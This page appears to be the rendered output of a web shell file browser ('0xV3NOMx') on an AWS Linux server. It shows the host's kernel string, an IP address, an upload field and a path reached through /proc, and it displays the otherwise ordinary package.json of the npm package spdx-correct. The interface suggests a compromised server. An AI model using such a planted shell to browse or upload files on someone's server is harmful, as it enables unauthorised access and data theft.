0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 52.15.70.0


Current Path : /proc/thread-self/root/usr/lib/nodejs/spdx-correct/
Upload File :
Current File : //proc/thread-self/root/usr/lib/nodejs/spdx-correct/package.json

{
  "name": "spdx-correct",
  "description": "correct invalid SPDX identifiers",
  "version": "1.0.2",
  "author": "Kyle E. Mitchell <kyle@kemitchell.com> (https://kemitchell.com)",
  "dependencies": {
    "spdx-license-ids": "^1.0.2"
  },
  "devDependencies": {
    "defence-cli": "^1.0.1",
    "replace-require-self": "^1.0.0",
    "spdx-expression-parse": "^1.0.0",
    "tape": "~4.0.0"
  },
  "keywords": [
    "SPDX",
    "law",
    "legal",
    "license",
    "metadata"
  ],
  "license": "Apache-2.0",
  "repository": "kemitchell/spdx-correct.js",
  "scripts": {
    "test": "defence README.md | replace-require-self | node && tape *.test.js"
  }
}